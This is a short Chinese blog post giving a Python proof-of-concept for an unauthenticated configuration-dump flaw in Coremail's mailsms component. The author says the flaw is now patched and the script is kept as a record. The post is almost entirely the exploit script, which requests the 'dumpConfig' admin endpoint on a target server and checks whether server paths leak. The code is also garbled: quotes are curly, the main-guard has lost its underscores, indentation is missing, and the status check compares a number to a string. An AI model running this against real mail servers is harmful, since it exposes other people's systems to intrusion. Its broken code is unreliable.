关于coremail的0day

#-- Coding: utf-8 --
#Author: Vulkey_Chen
#Email: [email protected]
#Website: www.hi-ourlife.com
#About: mailsms config dump PoC

import requests,sys

def mailsmsPoC(url):
url = url + “/mailsms/s?func=ADMIN:appState&dumpConfig=/”
r = requests.get(url)
if (r.status_code != ‘404’) and ("/home/coremail" in r.text):
print “mailsms is vulnerable: {0}”.format(url)
else:
print “mailsms is safe!”

if name == ‘main’:
try:
mailsmsPoC(sys.argv[1])
except:
print “usage: python poc.py http://hi-ourlife.com/”

最新版本已修复 我只是记一下脚本

你可能感兴趣的:(0day,0day,for,coremail)